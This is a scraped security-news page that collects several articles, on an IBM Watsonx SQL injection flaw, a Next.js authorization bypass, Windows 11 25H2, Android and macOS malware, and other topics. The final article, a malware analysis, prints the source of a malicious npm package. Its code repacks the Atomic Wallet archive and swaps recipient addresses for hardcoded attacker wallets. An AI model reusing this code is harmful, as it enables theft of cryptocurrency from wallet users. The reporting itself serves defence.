1010.cx

  • IBM Watsonx Vulnerability Let Attackers Inject Malicious SQl Queries

    ·

    ,

    IBM published a security bulletin disclosing a serious Blind SQL injection vulnerability in its IBM Watsonx Orchestrate Cartridge for IBM Cloud Pak for Data, assigned CVE-2025-0165. 

    With a CVSS 3.1 base score of 7.6, this flaw could allow remote attackers with low privileges to compromise sensitive back-end databases by injecting malicious SQL statements.

    Key Takeaways
    1. Blind SQL injection in IBM Watsonx Orchestrate.
    2. Caused by improper input sanitization.
    3. Upgrade immediately—no workarounds.

    Blind SQL Injection Vulnerability

    The vulnerability originates from improper sanitization of user-supplied input in the Orchestrate Cartridge’s query processing engine. 

    Specifically, the cartridge fails to neutralize special SQL elements before concatenating them into dynamic queries, violating CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’). An attacker who crafts a payload such as:

    IBM Watsonx Vulnerability

    and submitting it through an exposed API endpoint could execute arbitrary SQL commands. This could enable the attacker to:

    • Read confidential records
    • Modify user permissions
    • Delete critical data
    • Insert malicious entries

    The CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L) indicates network exploitability with low attack complexity and no user interaction, but requiring authenticated (low-privilege) access. 

    The vulnerability compromises confidentiality to a high degree, integrity to a low degree, and availability to a low degree.

    Affected versions include IBM Watsonx Orchestrate Cartridge for Cloud Pak Data version 4.8.4–4.8.5 and 5.0.0–5.2.

    Risk FactorsDetails
    Affected ProductsIBM watsonx Orchestrate Cartridge for IBM Cloud Pak for Data versions 4.8.4–4.8.5 and 5.0.0–5.2
    ImpactRead, add, modify, or delete backend database
    Exploit PrerequisitesAuthenticated low-privilege network access
    CVSS 3.1 Score7.6 (High)

    Mitigations

    IBM strongly urges all customers to upgrade to IBM Watsonx Orchestrate Cartridge version 5.2.0.1 immediately. 

    The patch enforces strict input validation and parameterized queries, effectively neutralizing malicious SQL tokens before execution. Detailed upgrade instructions are available in the IBM documentation.

    Currently, there are no workarounds or temporary mitigations endorsed by IBM, making prompt patching critical. Organizations should also:

    • Review database logs for anomalous query patterns
    • Implement a Web Application Firewall (WAF) with SQL injection rules
    • Enforce the principle of least privilege on service accounts

    By addressing CVE-2025-0165 now, enterprises can safeguard their AI-driven orchestration workflows from unauthorized data manipulation and ensure compliance with organizational security policies.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post IBM Watsonx Vulnerability Let Attackers Inject Malicious SQl Queries appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Critical Next.js Flaw Lets Attackers Bypass Authorization Controls

    ·

    , , , ,

    A newly disclosed critical vulnerability in the Next.js framework, tracked as CVE-2025-29927, allows unauthenticated attackers to bypass middleware-based authorization checks by exploiting improper handling of the x-middleware-subrequest HTTP header. This flaw impacts all versions of Next.js that rely on this header to differentiate between internal subrequests and external traffic, risking exposure of protected routes and administrative interfaces. […]

    The post Critical Next.js Flaw Lets Attackers Bypass Authorization Controls appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple Hints That iPhone 17 Is to Eliminate the Physical SIM Card

    ·

    ,

    Apple appears to be laying the groundwork to remove the physical SIM card slot from its upcoming iPhone 17 models in more countries, with a significant push anticipated across the European Union.

    The move aligns with the company’s long-term strategy of transitioning to more secure and flexible eSIM technology, a change already implemented in the United States.

    A source familiar with the matter has indicated that Apple is mandating that employees at Apple Authorized Resellers across the 27 countries of the European Union complete a training course on iPhones with eSIM support.

    The deadline for this training is reportedly Friday, September 5, just four days before Apple is expected to unveil the iPhone 17 lineup at its “Awe Dropping” event on Tuesday, September 9.

    The timing of this mandatory training strongly suggests that at least some iPhone 17 models sold in the EU, which includes major markets like France, Germany, Italy, and Spain, will lack a physical SIM tray.

    This would require customers in those countries to adopt eSIM technology, which is a digital SIM that allows users to activate a cellular plan from a carrier without needing a physical nano-SIM card.

    Further evidence suggests the shift could extend beyond Europe. The training materials are being distributed through Apple’s SEED app, a platform used by Apple Store and authorized reseller staff globally.

    This has fueled speculation that the company is preparing for a much broader international rollout of eSIM-only iPhones.

    Apple first removed the physical SIM tray from its iPhones sold in the U.S. starting with the iPhone 14 series in 2022, citing improved security and convenience.

    An eSIM cannot be physically removed if a device is lost or stolen, and it allows users to easily switch between carriers and manage multiple phone numbers on a single device.

    Rumors suggest that the new, ultra-thin “iPhone 17 Air” model is a prime candidate to be eSIM-only in all regions due to its slim design, which necessitates saving internal space.

    However, the change could potentially apply to the entire iPhone 17 lineup, including the Pro and Pro Max models, in many markets.

    The transition is not expected to be universal. Markets like China, where regulatory resistance to eSIMs is high and dual physical SIMs are common, will likely retain the physical SIM slot.

    Other regions, such as India, which currently offer both eSIM and physical SIM support, may see a mixed lineup where some models, like the rumored iPhone 17 Air, become eSIM-only. The full extent of Apple’s plan will become clear at its official announcement next week.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Apple Hints That iPhone 17 Is to Eliminate the Physical SIM Card appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • MediaTek Issues Security Update to Patch Multiple Chipset Flaws

    ·

    , , , ,

    MediaTek today published its September 2025 Product Security Bulletin, disclosing and remediating a series of critical and moderate vulnerabilities in its modem and system components. The announcement highlights that all affected device OEMs have already received patches for at least two months, and there is currently no evidence of any exploit in the wild. According […]

    The post MediaTek Issues Security Update to Patch Multiple Chipset Flaws appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers Register Domains to Target 2026 FIFA World Cup in Cyberattack

    ·

    , , ,

    A concerning surge in malicious domain registrations designed to exploit the upcoming 2026 FIFA World Cup, with threat actors already positioning themselves more than a year before the tournament begins. A comprehensive investigation by PreCrime Labs, the threat research division of BforeAI, has revealed that cybercriminals are systematically registering fraudulent domains to capitalize on the […]

    The post Hackers Register Domains to Target 2026 FIFA World Cup in Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Windows 11 25H2 Update Preview Released, What’s New?

    ·

    , ,

    Microsoft has opened the Release Preview Channel to Windows Insiders for the forthcoming Windows 11, version 25H2 (Build 26200.5074) enablement package (eKB), offering an early look at this year’s annual feature update. 

    Insiders can now opt in via Windows Update’s “seeker” experience, with general availability slated for later in the calendar year.

    Key Takeaways
    1. Windows 11 25H2 (Build 26200.5074) via enablement package.
    2. Drops PowerShell 2.0/WMIC, adds UI/performance tweaks, app removal controls.
    3. Install now in Release Preview.

    Streamlined Delivery via Enablement Package

    Windows 11, version 25H2, leverages a shared servicing branch with its predecessor, version 24H2, meaning both releases share the same cumulative updates while feature activation is controlled through an enablement package (eKB). 

    This enables Microsoft to deliver new features and enhancements through its continuous innovation pipeline without requiring a full OS reinstall. 

    Once Build 26200.5074 is installed, future monthly cumulative updates will arrive through the standard servicing channel, simplifying update management for both home and enterprise users.

    Key delivery details:

    • Enablement package (eKB) model for rapid feature toggling
    • Shared servicing branch with Windows 11, version 24H2
    • Continuous innovation via monthly cumulative updates

    The 25H2 preview introduces several notable feature enhancements along with select deprecations:

    PowerShell 2.0 and Windows Management Instrumentation command-line (WMIC) have been removed, aligning with Microsoft’s move toward modern management tooling such as PowerShell 7 and Windows Management Infrastructure (WMI) APIs.

    IT administrators on Enterprise and EDU devices can now remove select pre-installed Microsoft Store apps via Group Policy or MDM CSP policies, granting greater control over default app footprints.

    Visual refinements to the Start menu and taskbar behaviors, including updated animations and improved drag‐and‐drop support.

    Kernel and scheduler optimizations aimed at reducing latency for foreground applications.

    Commercial* customers can validate and deploy the preview build across organizational devices via Windows Update for Business (WUfB), Windows Server Update Services (WSUS), or Azure Marketplace. 

    Pre-release feature updates can also be managed using Windows as a Service (WaaS) deployment methods, documented by Microsoft.

    Insider Preview Installation 

    Windows Insiders on PCs meeting Windows 11 hardware requirements can navigate to Settings → Windows Update and select “Download and install” under Optional updates to get Build 26200.5074. 

    Windows 11 version 25H2
    Windows 11 version 25H2

    After installation, devices remain enrolled in the Release Preview Channel and will continue to receive cumulative servicing updates automatically.

    For organizations seeking offline media, ISO files for version 25H2 will be published next week on the Windows Insider ISO download page. 

    Should any issues arise during deployment or testing, IT admins can open support cases through Microsoft Support for Business.

    Commercial devices are defined as non-Home editions managed by IT or joined to enterprise domains. 

    Continuous testing and feedback from the Windows Insider Program community ensure a polished release when Windows 11, version 25H2, reaches general availability later this year.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Windows 11 25H2 Update Preview Released, What’s New? appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Salesforce Publishes Forensic Guide After Series of Cyberattacks

    ·

    , , ,

    Salesforce has published a comprehensive forensic investigation guide aimed at empowering organizations to detect, analyze, and remediate security incidents within their Salesforce environments. The new guide distills best practices across three critical areas: activity logs, user permissions, and backup data—providing a structured framework to answer key questions such as “What did a specific user do […]

    The post Salesforce Publishes Forensic Guide After Series of Cyberattacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Fraudulent Scholarship Apps Target Students in “Defarud” Scam Campaign

    ·

    ,

    An Android malware tracker named SikkahBot, active since July 2024 and explicitly targeting students in Bangladesh. Disguised as applications from the Bangladesh Education Board, SikkahBot lures victims with promises of scholarships, coerces them into sharing sensitive information, and requests high-risk permissions. Once installed, it harvests personal and financial data, intercepts SMS messages, abuses the Accessibility […]

    The post Fraudulent Scholarship Apps Target Students in “Defarud” Scam Campaign appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers Exploit macOS Security Features to Spread Malware

    ·

    , , , ,

    A growing wave of sophisticated attacks is turning macOS’s built-in security defenses into avenues for malware distribution, according to recent security research. As macOS continues to gain market share, cybercriminals are adapting their strategies to exploit even the most robust Apple protections. Analysts warn that relying solely on native safeguards may leave organizations vulnerable to […]

    The post Hackers Exploit macOS Security Features to Spread Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions

    ·

    , ,

    Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, boasting approximately 3.9 million weekly downloads.

    At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.

    This deceptive functionality serves as a Trojan horse, engaging quietly in covert operations that prey on desktop cryptocurrency wallets installed on Windows systems.

    Malicious package (Source – Socket.dev)

    As organizations continued to integrate open-source dependencies into their development pipelines, attackers recognized the potency of import-time tampering.

    Socket.dev analysts noted that upon import, nodejs-smtp immediately invokes an Electron-based payload designed to infiltrate wallets such as Atomic Wallet and Exodus.

    By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.

    Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.

    Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.

    These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.

    Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.

    In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.

    Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.

    The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.

    Infection Mechanism and Persistence Tactics

    Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.

    In the first stage, the package’s lib/engine/index.js script executes immediately upon import:-

    // lib/engine/index.js
const os = require('os');
const fs = require('fs').promises;
const path = require('path');
const asar = require('asar');

async function patchAtomic() {
  try {
    const base    = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
    const resDir  = path.join(base, 'atomic', 'resources');
    const asarIn  = path.join(resDir, 'app.asar');
    const workDir = path.join(resDir, 'output');
    const implant = path.join(__dirname, 'a.js');
    const target  = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');

    await fs.mkdir(workDir, { recursive: true });
    asar.extractAll(asarIn, workDir);
    await fs.copyFile(implant, target);
    asar.createPackage(workDir, asarIn);
    await fs.rm(workDir, { recursive: true, force: true });
  } catch {}
}

patchAtomic();

    This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the integrity-checked archive to mask traces.

    Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:

    // lib/engine/a.js
async sendCoins() {
  if (await this.validatePassword()) {
    if (this.coin.ticker === 'BTC')
      this.inputs.address = '17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy';
    else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
      this.inputs.address = '0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24';
    // Additional mappings for TRX-USDT, XRP, SOL omitted
  }
}

    By executing during import, nodejs-smtp avoids detection by static scanners that only inspect function calls at runtime. This persistent, import-time hook highlights the evolving threat landscape within open-source ecosystems, underscoring the need for supply chain–aware security measures.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶